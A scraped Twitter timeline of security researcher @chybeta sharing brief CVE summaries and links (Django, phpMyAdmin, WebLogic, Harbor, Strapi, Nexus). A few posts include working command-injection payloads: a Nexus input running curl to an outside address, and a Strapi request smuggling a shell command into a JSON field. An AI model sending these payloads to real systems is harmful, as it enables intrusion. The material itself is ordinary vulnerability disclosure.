| Tweetovi |
|
Henry Chen
@chybeta
|
11 h |
|
the citrix offer a tool to check CVE-2019-19781
support.citrix.com/article/CTX269…
if ("[global]") and ("encrypt passwords") and ("name resolve order") in str(response):
=>
if True and True and ("name resolve order") in str(response):
🤔🤔🤔 pic.twitter.com/JnojIYdYMh
|
||
|
|
||
|
Henry Chen
@chybeta
|
3. velj |
|
CVE-2020-7471: SQLI in Django:
django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter.
djangoproject.com/weblog/2020/fe…
FIX: github.com/django/django/… pic.twitter.com/NljqLmin93
|
||
|
|
||
|
Henry Chen
@chybeta
|
16. sij |
|
CVE-2020-2551 WebLogic RCE via IIOP protocol. pic.twitter.com/WyKVkQASiL
|
||
|
|
||
|
Henry Chen
@chybeta
|
16. sij |
|
;)工作不饱和
|
||
|
|
||
|
Henry Chen
@chybeta
|
15. sij |
|
Authenticated
|
||
|
|
||
|
Henry Chen
@chybeta
|
15. sij |
|
CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page
phpmyadmin.net/security/PMASA…
fix: github.com/phpmyadmin/php… pic.twitter.com/S3a3B1zHz4
|
||
|
|
||
|
Henry Chen
@chybeta
|
10. sij |
|
find a "new" way to get JDBC Deserialization RCE and it doesn't need any interceptor . pic.twitter.com/kYEZoE4WGP
|
||
|
|
||
|
Henry Chen
@chybeta
|
3. sij |
|
after digging deep into this commit
github.com/phpmyadmin/php…
you will find it's actually a XSS...
more details: xz.aliyun.com/t/6960
related issue: github.com/phpmyadmin/php… twitter.com/chybeta/status… pic.twitter.com/fIdikBOHbo
|
||
|
|
||
|
Henry Chen
@chybeta
|
2. sij |
|
CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that uses the `toBSON` method
however there are lots of no-auth mongo-express ...
shodan: shodan.io/search?query=M…
poc: github.com/masahiro331/CV… pic.twitter.com/zp7EK2cmu3
|
||
|
|
||
|
Henry Chen
@chybeta
|
29. pro |
|
Apereo Cas 4.2.X Remote Code Execution.(execution =xxx_ZXlKaGJH...):GIF👇
and about the Apereo Cas 4.1.X Remote Code Execution.(execution =xxx_AAAAIg...):
twitter.com/pyn3rd/status/…
Thanks @pyn3rd pic.twitter.com/7HmCFT5wcT
|
||
|
|
||
|
Henry Chen
@chybeta
|
10. pro |
|
attack unauth scrapyd by deploying evil egg。
author: @phithon_xg
leavesongs.com/PENETRATION/at…
github.com/vulhub/vulhub/… pic.twitter.com/uOewwNEJ5w
|
||
|
|
||
|
Henry Chen
@chybeta
|
9. pro |
|
CVE-2019-15588 OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475)
"createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo
CVE-2019-15588 hackerone.com/reports/688270
CVE-2019-5475 hackerone.com/reports/654888 twitter.com/700_isnuoT/sta… pic.twitter.com/obBu2yRv44
|
||
|
|
||
|
Henry Chen
@chybeta
|
9. pro |
|
👀?
|
||
|
|
||
|
Henry Chen
@chybeta
|
8. pro |
|
👍
|
||
|
|
||
|
Henry Chen
@chybeta
|
6. pro |
|
CVE-2019-19609 Strapi Framework Post-Auth RCE
curl -H $'Authorization: Bearer [jwt]' ... --data {"plugin": "documentation && $(whoami > /tmp/whoami)","port":"1337"}
bittherapy.net/post/strapi-fr… pic.twitter.com/Xy0RL8l3kS
|
||
|
|
||
|
Henry Chen
@chybeta
|
5. pro |
|
要
|
||
|
|
||
|
Henry Chen
@chybeta
|
4. pro |
|
CVE-2019-3990 User Enumeration Vulnerability
GET /api/users/search?email=@test.com
=> {"code":400,"message":"username is required"}
GET /api/users/search?username=t
=> User Enumeration
github.com/goharbor/harbo… twitter.com/chybeta/status… pic.twitter.com/aLRMzmppGt
|
||
|
|
||
|
Henry Chen
@chybeta
|
4. pro |
|
Harbor Security Update:
1. Privilege Escalation
2. CVE-2019-19029 SQL Injection via user-groups
3. CVE-2019-19026 SQL Injection via project quotas
4. CVE-2019-19025 Missing CSRF protection
5. CVE-2019-3990 User Enumeration Vulnerability
github.com/goharbor/harbo… pic.twitter.com/jPZcUK9wvv
|
||
|
|
||
|
Henry Chen
@chybeta
|
4. pro |
|
CVE-2019-5096 GoAhead web server code execution vulnerability : An exploitable code execution vulnerability exists in the processing of multi-part/form-data requests within the base GoAhead web server application in versions v5.0.1, v.4.1.1 and v3.6.5.
talosintelligence.com/vulnerability_…
|
||
|
|
||
|
Henry Chen
@chybeta
|
2. pro |
|
CVE-2019-19118: Privilege escalation in the Django admin.
djangoproject.com/weblog/2019/de… pic.twitter.com/wcqweZHCoW
|
||
|
|
||